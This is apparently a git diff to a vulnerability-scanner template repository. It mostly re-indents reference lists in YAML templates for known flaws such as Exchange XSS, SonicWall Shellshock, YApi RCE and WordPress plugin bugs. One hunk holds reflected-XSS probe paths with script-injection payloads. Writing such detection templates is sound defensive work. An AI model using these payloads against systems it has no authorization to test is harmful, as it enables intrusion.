+ - https://www.maianscriptworld.co.uk/critical-updates
tags: rce,unauth,maian
requests:
diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
index a138c0ceb1..0eac266103 100644
--- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
+++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
@@ -5,8 +5,8 @@ info:
author: infosecsanyam
severity: medium
reference:
- - https://www.shodan.io/search?query=http.title%3A%22Outlook%22
- - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
+ - https://www.shodan.io/search?query=http.title%3A%22Outlook%22
+ - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
tags: miscrsoft,exchange,owa,xss
requests:
diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
index c03bb02530..a1913d882f 100644
--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@@ -5,8 +5,8 @@ info:
author: dhiyaneshDk
severity: medium
reference:
- - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
- - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
+ - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
tags: exposure,config,lfi,nginx
requests:
diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml
index 57dc49ae6e..5bccb904ea 100644
--- a/vulnerabilities/other/opensns-rce.yaml
+++ b/vulnerabilities/other/opensns-rce.yaml
@@ -5,8 +5,8 @@ info:
author: gy741
severity: critical
reference:
- - http://www.0dayhack.net/index.php/2417/
- - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
+ - http://www.0dayhack.net/index.php/2417/
+ - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
tags: opensns,rce
requests:
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index 5d4a64ee03..393ae08a2a 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -9,8 +9,8 @@ info:
# This template supports the user creation part only.
# To triggering an RCE, see reference[2].
reference:
- - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- - https://www.exploit-db.com/exploits/48878
+ - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
+ - https://www.exploit-db.com/exploits/48878
requests:
- raw:
diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
index 417e1cbc8a..95c345c98a 100644
--- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
+++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
@@ -5,8 +5,8 @@ info:
author: PR3R00T
severity: critical
reference:
- - https://twitter.com/chybeta/status/1353974652540882944
- - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
+ - https://twitter.com/chybeta/status/1353974652540882944
+ - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
tags: shellshock,sonicwall,rce,vpn
requests:
diff --git a/vulnerabilities/other/wooyun-path-traversal.yaml b/vulnerabilities/other/wooyun-path-traversal.yaml
index 515f1293b5..3956371181 100644
--- a/vulnerabilities/other/wooyun-path-traversal.yaml
+++ b/vulnerabilities/other/wooyun-path-traversal.yaml
@@ -6,9 +6,9 @@ info:
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
description: |
- A general document of UFIDA ERP-NC contains a vulnerability
- (affecting a large number of well-known school government and enterprise cases
- such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
+ A general document of UFIDA ERP-NC contains a vulnerability
+ (affecting a large number of well-known school government and enterprise cases
+ such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
tags: lfi
requests:
diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml
index d3c9c3cab1..5fc0d294da 100644
--- a/vulnerabilities/other/yapi-rce.yaml
+++ b/vulnerabilities/other/yapi-rce.yaml
@@ -6,10 +6,10 @@ info:
severity: critical
tags: yapi,rce
reference:
- - https://www.secpulse.com/archives/162502.html
- - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
- - https://twitter.com/sec715/status/1415484190561161216
- - https://github.com/YMFE/yapi
+ - https://www.secpulse.com/archives/162502.html
+ - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
+ - https://twitter.com/sec715/status/1415484190561161216
+ - https://github.com/YMFE/yapi
requests:
- raw:
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
index a536f56a59..4e45972403 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
tags: wordpress,woocomernce,sqli,wp-plugin
reference:
- - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
+ - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
+ - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
index bf94656f63..4a0d110f9c 100644
--- a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
+++ b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
@@ -7,8 +7,8 @@ info:
description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials
tags: wordpress,plugin
reference:
- - https://www.exploit-db.com/exploits/48910
- - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
+ - https://www.exploit-db.com/exploits/48910
+ - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
index 5b19ad3ae3..5b4e1dba05 100644
--- a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
@@ -6,8 +6,8 @@ info:
severity: info
description: Searches for sensitive directories present in the wordpress-plugins plugin.
reference:
- - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
- - https://www.exploit-db.com/ghdb/6979
+ - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
+ - https://www.exploit-db.com/ghdb/6979
tags: wordpress,listing
requests:
diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
index b4305c81e7..991edafc3b 100644
--- a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
@@ -7,8 +7,8 @@ info:
tags: wordpress,wp-plugin,lfi
description: Arbitrary file download in Memphis Document Library 3.1.5
reference:
- - https://www.exploit-db.com/exploits/39593
- - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
+ - https://www.exploit-db.com/exploits/39593
+ - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
index 61a03ab44b..a2ef9e9166 100644
--- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml
+++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
@@ -11,9 +11,9 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
index 82c7b74499..08ee90fd10 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
@@ -6,9 +6,9 @@ info:
severity: medium
description: Allows attacker to view sensitive information such as company invoices
reference:
- - https://twitter.com/sec_hawk/status/1426984595094913025?s=21
- - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
- - https://woocommerce.com/products/pdf-invoices/
+ - https://twitter.com/sec_hawk/status/1426984595094913025?s=21
+ - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
+ - https://woocommerce.com/products/pdf-invoices/
tags: wordpress,listing,exposure
requests: